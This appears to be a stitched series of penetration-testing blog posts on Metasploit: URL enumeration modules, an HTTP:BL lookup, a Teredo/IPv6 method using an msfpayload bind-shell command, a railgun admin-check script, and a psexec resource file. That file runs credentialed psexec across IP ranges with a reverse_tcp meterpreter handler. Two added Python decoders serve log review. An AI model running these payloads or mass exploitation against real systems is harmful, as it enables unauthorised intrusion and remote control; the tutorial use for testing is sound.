[UPDATE] This module (enum_delicious) has been pulled from Metasploit since Delicious no longer allows searching by site.
In the last post I showed how Archive.org's Wayback Machine can be used to pull URLs for a domain. Another place where URLs are stored and can be searched by domain is Delicious.com (a bookmarking service). I've seen people bookmark everything from internal web portals to URLs with special no-auth passwords in them. It may even reveal subdomains and hosts you didn't know about. This can be a very handy set of data.
Be forewarned though: Delicious has been putting ads in the results and I haven't gotten a solid regex working to pick them out yet, so comb your results before slamming them into the requestor script from the last post. The module works basically the same way, but here it is in action:
Archive.org allows you to check the history of sites and pages, but a service most are not aware of is one that allows you to get a list of every page Archive.org has for a given domain. This is great for enumerating web applications; many times you'll find parts of web apps that have been long forgotten (and usually vulnerable).
This module doesn't make any requests to the targeted domain; it simply outputs a list, to the screen or to a file, of all the pages it has found on Archive.org.
msf auxiliary(enum_wayback) > info
Name: Pull Archive.org stored URLs for a domain
Version: 10394
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Rob Fuller
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN portswigger.net yes Domain to request URLS for
OUTFILE no Where to output the list for use
Description:
This module pulls and parses the URLs stored by Archive.org for the
purpose of replaying during a web assessment. Finding unlinked and
old pages.
msf auxiliary(enum_wayback) > run
[*] Pulling urls from Archive.org
[*] Located 289 addresses for portswigger.net
http://portswigger.net/
http://portswigger.net/books/
http://portswigger.net/burp/
http://portswigger.net/burp/bullet.gif
http://portswigger.net/burp/buy.html
http://portswigger.net/burp/help.html
http://portswigger.net/burp/ps.css
http://portswigger.net/burp/screenshots.html
http://portswigger.net/burp/tc.html
http://portswigger.net/corner.gif
**SNIPPED**
You can set the OUTFILE so that you can parse it a bit and import it into Burp, or use a quick script to make the queries yourself. Here is one I wrote in python:
Most malicious IP lists focus on the client side threat, where servers (hosted or exploited) host client side exploits or evil scripting.
These don’t really help the server admins very much. Project Honeypot does an amazing job at keeping detailed information on scanners / harvesters and brute forcers, the likes of which are the daily enemy of said admins. They offer a service called HTTP Block List or ‘HTTP:BL’.
Another way this list differs from the rest is that it isn't a list you can download. It's a DNS service. Simply put, you submit a query and it gives back an (A) record that looks something like '127.3.5.1'. Disregard the 127; the remaining octets each encode a different detail about the IP you asked about. You can read the documentation here: http://www.projecthoneypot.org/httpbl_api.php for an explanation of exactly how it works, or you can read the code of the Metasploit module I wrote for it.
I wrote it in Metasploit for 2 reasons. 1) RangeWalker is awesome code, and allows you to query a list of IPs, a range, or a single IP with ease. 2) All of the other implementations of the API that they have listed are for CMSs (to actively block IPs that come back ‘bad’).
This will mostly come in useful for incident responders who are trying to get a bead on a bunch of hosts, or for web admins who want to pull the code out for an active blocking system of their own.
msf auxiliary(httpbl_lookup) > info
Name: Http:BL lookup
Version: xxxx
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Rob Fuller
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
APIKEY xxxxxxxxxxxx yes Your HTTP:BL api key
RHOSTS 88.229.108.0/24 yes The target address range or CIDR identifier
THREADS 1 yes The number of concurrent threads
Description:
This module can be used to enumerate information about a IP
addresses from Project HoneyPot's HTTP Block List.
References:
http://www.projecthoneypot.org/httpbl_api.php
msf auxiliary(httpbl_lookup) > run
[*]
[*] 88.229.108.0 resloves to 127.51.8.1 which means: Suspicious
[*] => it was last seen 51 day ago and has a threat score of 8 or 'less than 100 spam messages'
[*] => more info here: http://www.projecthoneypot.org/ip_88.229.108.0
[*]
[*] 88.229.108.1 resloves to 127.29.8.1 which means: Suspicious
[*] => it was last seen 29 day ago and has a threat score of 8 or 'less than 100 spam messages'
[*] => more info here: http://www.projecthoneypot.org/ip_88.229.108.1
[*]
[*] 88.229.108.2 resloves to 127.29.8.1 which means: Suspicious
[*] => it was last seen 29 day ago and has a threat score of 8 or 'less than 100 spam messages'
[*] => more info here: http://www.projecthoneypot.org/ip_88.229.108.2
[*]
[*] 88.229.108.254 resloves to 127.51.8.1 which means: Suspicious
[*] => it was last seen 51 day ago and has a threat score of 8 or 'less than 100 spam messages'
[*] => more info here: http://www.projecthoneypot.org/ip_88.229.108.254
[*]
[*] 88.229.108.255 resloves to 127.29.8.1 which means: Suspicious
[*] => it was last seen 29 day ago and has a threat score of 8 or 'less than 100 spam messages'
[*] => more info here: http://www.projecthoneypot.org/ip_88.229.108.255
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(httpbl_lookup) >
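The decoding the module output above performs, as an added Python example (this is not the module's own Ruby): it builds the DNS query name from an API key and an IPv4 address and decodes the 127.x.y.z answer into days-since-seen, threat score and visitor type, following the HTTP:BL API documentation linked above. The API key and the sample answers are constructed placeholders.

```python
# Added example, not the Metasploit module's code: build an HTTP:BL query name
# and decode the 127.x.y.z answer, as described in the HTTP:BL API docs.
# decode_answer() works offline; lookup() only does a real DNS query when called.
import ipaddress
import socket
from typing import Optional

# Visitor-type bit flags carried in the last octet (per the HTTP:BL API docs).
TYPE_BITS = {1: "Suspicious", 2: "Harvester", 4: "Comment Spammer"}


def query_name(api_key: str, ip: str) -> str:
    """Reverse the IPv4 octets and wrap them in the API key and the zone."""
    octets = str(ipaddress.IPv4Address(ip)).split(".")
    return f"{api_key}.{'.'.join(reversed(octets))}.dnsbl.httpbl.org"


def decode_answer(answer: str) -> dict:
    """Turn the A record into days-since-seen, threat score and visitor type."""
    first, days, score, kind = (int(o) for o in answer.split("."))
    if first != 127:
        raise ValueError(f"not an HTTP:BL answer: {answer}")
    if kind == 0:
        # Type 0 is a search engine; the third octet then identifies the
        # engine instead of carrying a threat score.
        return {"type": "Search Engine", "engine_id": score}
    names = [name for bit, name in TYPE_BITS.items() if kind & bit]
    return {"days_since_seen": days, "threat_score": score,
            "type": ", ".join(names)}


def lookup(api_key: str, ip: str) -> Optional[dict]:
    """Live query; None means the IP is not listed (the name does not resolve)."""
    try:
        return decode_answer(socket.gethostbyname(query_name(api_key, ip)))
    except socket.gaierror:
        return None


if __name__ == "__main__":
    # Constructed sample answers matching the module output shown above.
    for ans in ("127.51.8.1", "127.29.8.1", "127.3.5.1"):
        print(ans, decode_answer(ans))
```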
At the April 2010 NoVA Hackers meeting I discussed some of the offensive uses of IPv6 on current networks. Well, around that time Microsoft issued a patch to all of the supported versions of Windows that broke my methodology. Obviously I wasn’t the only one doing this ;–)
Before I get ahead of myself, let's explain what Teredo is. Teredo is a tunneling service built in to Windows. Its intent, as far as I can tell, was to allow anyone to have access to the IPv6-enabled internet, free and dead simple, with no infrastructure changes needed. You can get into much more detail in the Teredo TechNet article, but essentially an internal host asks a Teredo server/relay for an IPv6 address. It does this over UDP, and by default Windows points at teredo.ipv6.microsoft.com on port 3544 (UDP).
When the tunnel is established, the host is given a 2001::/32 address. This address is a public IP. Before April this essentially meant that your Windows shares and any other listening service were publicly available, despite your NAT and firewall.
This isn't as much of a problem as you might think, as it's virtually impossible to guess or scan for an IPv6 address. So, unless you displayed it publicly by connecting to Freenode or posting it online somewhere (via a demonstration video), you're pretty safe.
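Those 2001::/32 addresses embed the Teredo server, the NAT type and the host's external IPv4 and UDP port, which is what a defender reviewing firewall or IDS logs needs to spot tunnels. This added Python example (not from the original post) decodes them per the RFC 4380 address layout; the server and client addresses and the log line are constructed samples.

```python
# Added example, not from the original post: decode Teredo (2001::/32) addresses
# found in log lines so a reviewer can see which Teredo server each host tunnels
# through and the external IPv4/UDP port its NAT mapped. Layout per RFC 4380 s.4.
import ipaddress

TEREDO_PREFIX = ipaddress.IPv6Network("2001::/32")


def encode_teredo(server: str, client: str, port: int, cone: bool = True) -> str:
    """Build a Teredo address; used here only to construct sample input."""
    flags = 0x8000 if cone else 0
    value = (0x20010000 << 96) | (int(ipaddress.IPv4Address(server)) << 64)
    value |= (flags << 48) | ((port ^ 0xFFFF) << 32)
    value |= int(ipaddress.IPv4Address(client)) ^ 0xFFFFFFFF
    return str(ipaddress.IPv6Address(value))


def decode_teredo(addr: str) -> dict:
    """Return the server, cone flag and de-obfuscated client IPv4/UDP port."""
    ip6 = ipaddress.IPv6Address(addr)
    if ip6 not in TEREDO_PREFIX:
        raise ValueError(f"{addr} is not a Teredo address")
    value = int(ip6)
    return {
        "server": str(ipaddress.IPv4Address((value >> 64) & 0xFFFFFFFF)),
        "cone_nat": bool((value >> 48) & 0x8000),
        "client_port": ((value >> 32) & 0xFFFF) ^ 0xFFFF,  # port is XOR 0xFFFF
        "client_ip": str(ipaddress.IPv4Address((value & 0xFFFFFFFF) ^ 0xFFFFFFFF)),
    }


def teredo_hosts(log_lines) -> dict:
    """Pick Teredo addresses out of free-form log lines and decode each one."""
    found = {}
    for line in log_lines:
        for tok in line.replace("=", " ").replace(",", " ").split():
            try:
                ip6 = ipaddress.IPv6Address(tok)
            except ValueError:
                continue  # not an IPv6 literal
            if ip6 in TEREDO_PREFIX:
                found[str(ip6)] = decode_teredo(str(ip6))
    return found


if __name__ == "__main__":
    # Constructed firewall-style log line; 192.0.2.1 stands in for a Teredo server.
    sample = encode_teredo("192.0.2.1", "198.51.100.7", 3544)
    line = f"ALLOW src={sample} dst=2001:db8::5 proto=tcp dport=445"
    for addr, info in teredo_hosts([line]).items():
        print(addr, info)
```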
THE PATCH
Microsoft made this a certainty when they issued the patch. I was unable to locate the specific one, or even identify for certain that it was April 2010, but that's when the initial article for IPV6_PROTECTION_LEVEL was published. This is a socket-level option that says: unless this flag is set to "PROTECTION_LEVEL_UNRESTRICTED" on the binary that is doing the communication, deny all traffic from NAT traversals (Teredo). (Even Netcat6 doesn't have this flag set!)
Essentially, unless someone rebuilt their binary with the explicit intention of allowing people to connect to it over NAT traversals, the traffic was denied. You were still allowed to connect out, keeping intact the initial idea for Teredo, but it broke my methodology, damn it!
I used Teredo to connect to the SMB server so that I could psexec a shell back any time I wanted (still possible on non-patched systems), but since Microsoft doesn't want to add the PROTECTION_LEVEL_UNRESTRICTED flag to SMB you have to just upload and use a binary that does. Luckily, with the help of Stephen Fewer, the bind_ipv6_tcp payload in Metasploit does.
COMMANDS
The commands used in the video are below:
netsh interface ipv6 install
netsh interface ipv6 set teredo enterpriseclient
./msfpayload windows/meterpreter/bind_ipv6_tcp LPORT=9001 X > bind.exe
The only thing that was behind the scenes was giving my Metasploit host an IPv6 address. I used Miredo (Teredo for *nix/OSX):
# Install miredo
apt-get install miredo
#Remove it from starting automatically
update-rc.d miredo -f remove
PROTECTION
Yes, it's that easy. Now, some of the mitigating suggestions I've seen on the net are to blackhole the Microsoft Teredo server or to block UDP port 3544. However, Miredo can act as a Teredo server/relay just fine, and can listen on any port you wish (53?). So unless you block ALL UDP outbound traffic, you are not protecting against this threat.
This is part one in a series of presentations I will be giving at the NoVAHackers meetings on forensics of all kinds as it can be leveraged in a penetration test.
When you first step on a machine, you want to determine quickly if you are just a user or an administrator. Meterpreter doesn't have a way to quickly check this. You could drop to a shell, check the local "Administrators" group and your own user, and correlate any groups that are shared between the outputs. You could run 'getsystem' and see whether any technique other than Kitrap0d works. You could also just do a 'ps' and notice that you can see 'SYSTEM' processes.
But I wanted a way to check a bunch of sessions all at once. So I wrote "AmIAdmin.rb", which uses meterpreter's railgun extension to execute "IsUserAnAdmin".
Since Shell32.dll isn't included in railgun by default, we have to add it. After writing it I decided to add some checks. These checks make sure that each piece of the script isn't already loaded. It's a good reference for doing this in the future.
(you can remove the print_status lines if you want the script to be quieter)
# Railgun does not run on x64 targets at this point, so bail out early.
if client.platform == "x64/win32"
  print_status "Railgun is currently not supported for x64 bit systems"
  raise Rex::Script::Completed
end

# Load the railgun extension only if it is not already present.
if client.railgun.present? == true
  print_status "Railgun already loaded.. skipping"
else
  print_status "Loading Railgun"
  client.core.use("railgun")
end

# shell32 is not one of railgun's default DLLs; add it if missing.
if client.railgun.dll['shell32'] == nil
  print_status "Adding Shell32.dll"
  client.railgun.add_dll('shell32', 'shell32')
else
  print_status "Shell32 already loaded.. skipping"
end

# Define the IsUserAnAdmin prototype (returns BOOL, takes no arguments) if missing.
if client.railgun.shell32.functions['IsUserAnAdmin'] == nil
  print_status "Adding the IsUserAnAdmin function"
  client.railgun.add_function('shell32', 'IsUserAnAdmin', 'BOOL', [])
else
  print_status "IsUserAnAdmin already loaded.. skipping"
end

print_status "Running the IsUserAnAdmin function"
status = client.railgun.shell32.IsUserAnAdmin()
if status["return"] == true then
  print_status "You are an administrator"
else
  print_error "You are not an administrator"
end
Exploit modules inside of metasploit don’t have the ability to run on multiple hosts with one swing of the bat. So I created some code to facilitate that. It’s really not much but there are some really juicy pieces of knowledge I learned on the way here.
The following is a resource file, but instead of just giving you something to download or straight copy and paste, I've broken it up into sections. Also take note of the "setg", which sets the variable globally so that I don't have to set it inside of the psexec module.
use multi/handler
setg PAYLOAD windows/meterpreter/reverse_tcp
setg LHOST 192.168.1.114
setg LPORT 80
set ExitOnSession false
exploit -j -z
This first part, while nothing spectacular, sets up the multi/handler beforehand so that each run of the exploit module doesn't have to set up and tear down the handler, which keeps things fast. The following, though, is just the setup for the module.
use windows/smb/psexec
set SMBUser Administrator
set SMBPass password123
Here is where it gets interesting though. Windows systems want something in SMBDomain, if they aren’t joined to a domain they can take pretty much anything here.
However if they are actually joined to a domain, you either have to have the computer name (which definitely won’t play well with a scanner easily) or use domain credentials.
set SMBDomain .
The “.” is something every Windows API programmer would know as it’s really well documented, but certainly not every Metasploit user. What it means is basically localhost, since SMB won’t take either localhost or 127.0.0.1.
Next up, we don’t want each run of the exploit module to build the multi/handler and tear it down every single run. That’s why we built it first and set DisablePayloadHandler inside of the psexec module.
set DisablePayloadHandler true
Resource files have been able to run blocks of Ruby in Metasploit since revision 8876. By putting in the <ruby> HTML-like block identifier you can then use the power of Ruby combined with Rex (Metasploit's API) to do really cool stuff.
More setup, but this time for the ruby portion. Using Metasploit’s RangeWalker, we can take all kinds of input, an IP, a CIDR range, and even a line separated file of IP addresses using the “file:” prefix.
So, we’ve included RangeWalker, parsed it, and loaded it into an ‘each’ for loop.
The self.run_single function allows you to send commands to msfconsole as if you were outside the ruby block. We set RHOST to each IP that RangeWalker parsed out. Simple, right?
That's it; we send all of the exploit modules one at a time to the background and tell msfconsole not to interact with them using "-z -j", just as we did with multi/handler.
Now, if your credentials worked on any of the IPs you’ll have sessions waiting for you.
This can easily be extended with one more loop and a bit of shuffling to make this into an SMB brute forcer that accepts hashes!
Hope you learned a few things. Oh, and just a caveat, this is NOT quiet or stealthy and will probably get you caught on a blackbox pentest, but this is really great for the smash and grab style of CTF competitions.